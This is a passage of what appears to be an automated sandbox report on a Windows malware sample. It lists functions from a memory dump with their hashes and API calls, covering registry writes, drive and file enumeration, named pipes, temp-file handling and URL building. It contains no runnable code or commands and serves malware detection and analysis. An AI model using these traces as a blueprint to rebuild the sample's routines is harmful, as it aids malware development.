  • Instruction Fuzzy Hash: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
APIs
  • RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
  • HeapFree.KERNEL32(00000000,?), ref: 001C9E08
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C947B: lstrlen.KERNEL32(?,001E5048,00000000), ref: 001C94A0
    • Part of subcall function 001C947B: wsprintfA.USER32 ref: 001C94E0
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9514
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C954D
    • Part of subcall function 001C947B: memcpy.NTDLL(?,001EB23B,-000000FA), ref: 001C95B0
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,?,001EB240), ref: 001C95FF
    • Part of subcall function 001C947B: memcpy.NTDLL(?,?,00000000), ref: 001C9619
    • Part of subcall function 001C947B: memcpy.NTDLL(?,00000000,001CAB3A), ref: 001C9638
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C964E
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9672
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C96B4
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C96D3
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,00000008,-000000F7,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C96F2
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000003B), ref: 001C9708
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000001,00000000,?), ref: 001C971D
    • Part of subcall function 001C947B: memmove.NTDLL(00000000,00000000,001CAB3A,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C9742
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C978D
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C97A9
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048), ref: 001C97C8
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000002C), ref: 001C97DB
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001C97F4
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(?,001E53C4), ref: 001C9802
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 001C9811
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001C982C
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,?,?,?,?,?,?,?,?,?,?,?,001EC448,?), ref: 001C9860
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C98AC
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C98C8
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,?,?,?,?,001EC448), ref: 001C98E7
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,00000000,00000001), ref: 001C992A
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9976
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C9992
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB23B,-00000006), ref: 001C99B1
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A), ref: 001C99E6
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9A25
  • HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D9692, Relevance: 10.6, APIs: 7, Instructions: 138 Total matches: 53string
Similarity
  • Total matches: 53
  • API ID: StrTrim$_struprlstrlenmemcpymemset
  • String ID:
  • API String ID: 2209883122-0
  • Opcode ID: 64815d0257e3aa2b83c4ddbe6b14a35168a99daac82a04345423b0ec2bb7509c
  • Instruction ID: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
  • Opcode Fuzzy Hash: E3018E5665E5F0D1C122289F4818335F842EF806EF719BA259C637068EBE0342607FE9
  • Instruction Fuzzy Hash: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D96C0
  • StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
  • _strupr.NTDLL ref: 001D9747
  • StrTrimA.SHLWAPI(?,?), ref: 001D9754
  • StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001C1314: RtlReAllocateHeap.NTDLL(00000000,?,?,001D9773), ref: 001C1324
  • memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C9BEF, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 125 Total matches: 48memory
Similarity
  • Total matches: 48
  • API ID: memcpy$HeapFreeRtlAllocateHeapRtlReAllocateHeap
  • String ID: W
  • API String ID: 1276199752-655174618
  • Opcode ID: f18a74b07f9afbff4fbb1da3eaf88715fd0ddee12a97bcb20455e5be1c2ad612
  • Instruction ID: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
  • Opcode Fuzzy Hash: 03016D10445B8247C55B60824161F6FE349BF40299C8DFB729DA8A55DA0F8133165B1F
  • Instruction Fuzzy Hash: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
  • RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9AD3: memcpy.NTDLL(00000000,001C9CB4,00000000,?,?,?,001C9CB4,00000000,?,?,8B50F445,001CAB3A), ref: 001C9B11
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,8B50F445,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9B97
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A), ref: 001C9BCE
    • Part of subcall function 001C9AD3: LocalFree.KERNEL32(001CAB3A,?,?,?,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?), ref: 001C9BDC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
  • memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDB50, Relevance: 10.6, APIs: 7, Instructions: 122 Total matches: 55memorystring
Similarity
  • Total matches: 55
  • API ID: HeapFree$RtlImageNtHeaderStrChrStrTrimlstrlen
  • String ID:
  • API String ID: 3913414161-0
  • Opcode ID: 64ffad91cf0a2c2a078577b4f201d2562d86aecfc72bb8ed0596f04317282702
  • Instruction ID: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
  • Opcode Fuzzy Hash: 0401CB24280D82C289019CEE845C63AE54AFB033E290D75B2D7523C00E7B437AF7EF09
  • Instruction Fuzzy Hash: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • StrChrA.SHLWAPI(00000000,00000020), ref: 001CDB7A
  • StrTrimA.SHLWAPI(00000000,001E53CC), ref: 001CDB90
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • RtlImageNtHeader.NTDLL(?), ref: 001CDBB8
  • HeapFree.KERNEL32(00000000,?), ref: 001CDBDF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • lstrlen.KERNEL32(00000000,00000000,?), ref: 001CDC47
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CDC76
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CDC94
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DB703, Relevance: 10.6, APIs: 7, Instructions: 112 Total matches: 56synchronizationthread
Similarity
  • Total matches: 56
  • API ID: CreateEventCreateMutexCreateThreadGetLastErrorRtlInitializeCriticalSectionmemcpymemset
  • String ID:
  • API String ID: 850450842-0
  • Opcode ID: 16ca8f20d85ab577bbc2653173ab980685e792abd2a2311232cd2963c8cd0ec7
  • Instruction ID: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
  • Opcode Fuzzy Hash: EDF0DDF30A4E85BBE423A12250A13BA0A03B74A2CEF8D3510FBB5640590F6072E26D45
  • Instruction Fuzzy Hash: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
APIs
  • memset.NTDLL ref: 001DB75F
  • memcpy.NTDLL(0000002C,00000000,00000010,00000000,00000000,00000054,00000054), ref: 001DB76D
  • RtlInitializeCriticalSection.NTDLL(00000008), ref: 001DB779
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB78C
  • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB7A6
  • CreateThread.KERNEL32(00000000,00000000,001DB47B,?,00000000,?), ref: 001DB7F0
  • GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 001DB810
    • Part of subcall function 001DB838: SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DB838: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB86F
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB87D
    • Part of subcall function 001DB838: RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
    • Part of subcall function 001DB838: RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
    • Part of subcall function 001DB838: Sleep.KERNEL32(000001F4), ref: 001DB8C1
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB8CE
    • Part of subcall function 001DB838: LocalFree.KERNEL32(?), ref: 001DB8DC
    • Part of subcall function 001DB838: RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1F61, Relevance: 10.6, APIs: 7, Instructions: 110 Total matches: 25memoryfilestring
Similarity
  • Total matches: 25
  • API ID: HeapFree$DeleteFileGetLastErrorInterlockedDecrementInterlockedIncrementlstrcpy
  • String ID:
  • API String ID: 699546578-0
  • Opcode ID: 532f2b5cd79be1598055c22557b2267d7091050a8bc957485613e12867e2baf4
  • Instruction ID: 7e10fe87f0924755e3c3f139aefbb8723367e80e6c71fdf06343399dbcc04d08
  • Opcode Fuzzy Hash: 63F076B8404D85CBC62364B588AA7BE46457F824E5D0CE33AA584B101B1F0365B79F85
  • Instruction Fuzzy Hash: 7e10fe87f0924755e3c3f139aefbb8723367e80e6c71fdf06343399dbcc04d08
APIs
  • InterlockedIncrement.KERNEL32(001EAF5C), ref: 001C1F73
  • lstrcpy.KERNEL32(00000000), ref: 001C1FA8
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
    • Part of subcall function 001DD17E: memset.NTDLL ref: 001DD192
  • HeapFree.KERNEL32(00000000,?), ref: 001C2050
    • Part of subcall function 001DD36B: memset.NTDLL ref: 001DD3C6
    • Part of subcall function 001DD36B: SetLastError.KERNEL32(00000000,?,?,?), ref: 001DD41A
    • Part of subcall function 001DD36B: WaitForSingleObject.KERNEL32(?,?), ref: 001DD599
    • Part of subcall function 001DD36B: Sleep.KERNEL32(?,?,?,00000001,?,?,00000000,0000000C,0000000F,?,00000000,00000000,?,?,?,?), ref: 001DD5AA
  • GetLastError.KERNEL32(00000000), ref: 001C2039
  • InterlockedDecrement.KERNEL32(001EAF5C), ref: 001C2067
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2098
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000), ref: 001C2088
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2A39, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 102 Total matches: 43memory
Similarity
  • Total matches: 43
  • API ID: HeapFree$CloseHandleRtlImageNtHeader
  • String ID: [FILE]$[FILE]
  • API String ID: 2457384462-3230400787
  • Opcode ID: 16df8d8f854be46f27ed78846379e5e64a1e712c0788b603984e536008b4b39b
  • Instruction ID: 7a99e9afe2944490d027556a012c57452c29353fe49cd997913ba4f9baac3b11
  • Opcode Fuzzy Hash: 94F0AC39154F43A7892360C4A0207A99B84FFA21D1C8CA723E9857D1CF7E033262BE43
  • Instruction Fuzzy Hash: 7a99e9afe2944490d027556a012c57452c29353fe49cd997913ba4f9baac3b11
APIs
  • RtlImageNtHeader.NTDLL(00000094), ref: 001C2A5A
    • Part of subcall function 001C29BF: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001C29BF: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
    • Part of subcall function 001C29BF: lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
    • Part of subcall function 001C29BF: HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
  • CloseHandle.KERNEL32(001EAF58), ref: 001C2AA0
    • Part of subcall function 001C2884: lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001C2884: WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
    • Part of subcall function 001C2884: CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
    • Part of subcall function 001C2884: GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2B43
    • Part of subcall function 001D9EAA: lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
    • Part of subcall function 001D9EAA: lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
    • Part of subcall function 001D9EAA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
    • Part of subcall function 001D9E63: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001D9E93
  • HeapFree.KERNEL32(00000000,00000000,.dll), ref: 001C2B52
    • Part of subcall function 001C28FD: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001C28FD: lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
    • Part of subcall function 001C28FD: lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
    • Part of subcall function 001C28FD: RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C70F5, Relevance: 10.6, APIs: 7, Instructions: 91 Total matches: 60memorystringsynchronization
Similarity
  • Total matches: 60
  • API ID: lstrlen$GetDriveTypeHeapFreeRtlAllocateHeapWaitForSingleObjectmemset
  • String ID:
  • API String ID: 3218151923-0
  • Opcode ID: 974418b0150871375a409eae20db66cf184f8890a346e9cc83530061c0aa9893
  • Instruction ID: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
  • Opcode Fuzzy Hash: 97F02461CA2887A7900B446974553AEDA116F416C9D4C0B62ED412814EAF0732E6EB4A
  • Instruction Fuzzy Hash: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C713F
  • memset.NTDLL ref: 001C715C
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C7178
  • GetDriveTypeW.KERNEL32(?), ref: 001C7186
  • lstrlenW.KERNEL32(?), ref: 001C7192
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • lstrlenW.KERNEL32(?), ref: 001C71BF
  • HeapFree.KERNEL32(00000000,?), ref: 001C71D8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6DF6, Relevance: 10.6, APIs: 7, Instructions: 90 Total matches: 57filesynchronization
Similarity
  • Total matches: 57
  • API ID: GetLastError$CloseHandleSetEndOfFileSetFilePointerWaitForSingleObjectWriteFile
  • String ID:
  • API String ID: 1310882240-0
  • Opcode ID: 428b72d32063ac54d5b905598191ac261dcad3cf285b84f146690d990cf327a1
  • Instruction ID: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
  • Opcode Fuzzy Hash: CAF02BA0515DC14BC217346516727BFD904EB425C5E4C7372A840420494F06769BAB5A
  • Instruction Fuzzy Hash: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
APIs
  • GetLastError.KERNEL32 ref: 001D6E41
  • WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
  • SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
  • WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
  • SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
  • GetLastError.KERNEL32 ref: 001D6EDD
  • CloseHandle.KERNEL32(00000006), ref: 001D6EE9
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBD48, Relevance: 10.6, APIs: 7, Instructions: 89 Total matches: 58memorystringpipe
Similarity
  • Total matches: 58
  • API ID: memcpy$CallNamedPipeGetLastErrorHeapFreeRtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 1038157847-0
  • Opcode ID: 6bb6ae630451ca86ee9df0719d803bcc4810f9cd3f6b8a390704e6ae44b564aa
  • Instruction ID: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
  • Opcode Fuzzy Hash: 73F05990085A81D2C123B42951217FFF194BEC02DBCDEA772E8E21885E2E0162A06B5D
  • Instruction Fuzzy Hash: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
APIs
  • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
  • memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
  • memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
  • CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
  • GetLastError.KERNEL32 ref: 001CBE07
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C79A7, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 87 Total matches: 56memoryfilestring
Similarity
  • Total matches: 56
  • API ID: HeapFree$DeleteFileStrTrimlstrlen
  • String ID: ss: *.*.*.*
  • API String ID: 1870149019-856079725
  • Opcode ID: 59ebdf1013b10810b54038a6e3da88a7dec1c4f015ef1646412946d67e45a806
  • Instruction ID: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
  • Opcode Fuzzy Hash: ECF09E21084D41AF8937286A50607F50915FB804F1C4DCFB7AC857B2857F836228BB4B
  • Instruction Fuzzy Hash: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • lstrlen.KERNEL32(00000000,?,00000F00), ref: 001C79CB
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • StrTrimA.SHLWAPI(00000000,001E53D4), ref: 001C7A55
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7A72
  • DeleteFileA.KERNEL32(00000000,00000000,?,?,001ECE60,00000000,?,00000F00), ref: 001C7A7A
  • HeapFree.KERNEL32(00000000,00000000,001ECE60), ref: 001C7A89
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7D61, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 75 Total matches: 58memory
Similarity
  • Total matches: 58
  • API ID: memcpy$RtlAllocateHeap
  • String ID: [URL]$https://
  • API String ID: 3738462082-2839221783
  • Opcode ID: afc151603a67bdcf01d5cf8a846d0f5f8a912d4aa94ead1b687b7b5f553c7413
  • Instruction ID: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
  • Opcode Fuzzy Hash: 21E02B245D1F02D6D85A20845438BB7C6873D42394CAE7766C950255772A25B174B588
  • Instruction Fuzzy Hash: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
APIs
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
  • memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
  • memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
  • memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C771B, Relevance: 10.6, APIs: 7, Instructions: 71 Total matches: 62memoryfilestring
Similarity
  • Total matches: 62
  • API ID: HeapFree$CloseHandleCreateFileRtlAllocateHeaplstrlenmbstowcs
  • String ID:
  • API String ID: 1841334458-0
  • Opcode ID: 88abf7bf9e6c094b0eee3fb77fa4d18763972b4349be3218ed9dbfc152fe13ca
  • Instruction ID: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
  • Opcode Fuzzy Hash: 2BE02B71181D5096C02719A68C58339E6056F422E4E5D4627FA013910FB24317E8EBAB
  • Instruction Fuzzy Hash: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
APIs
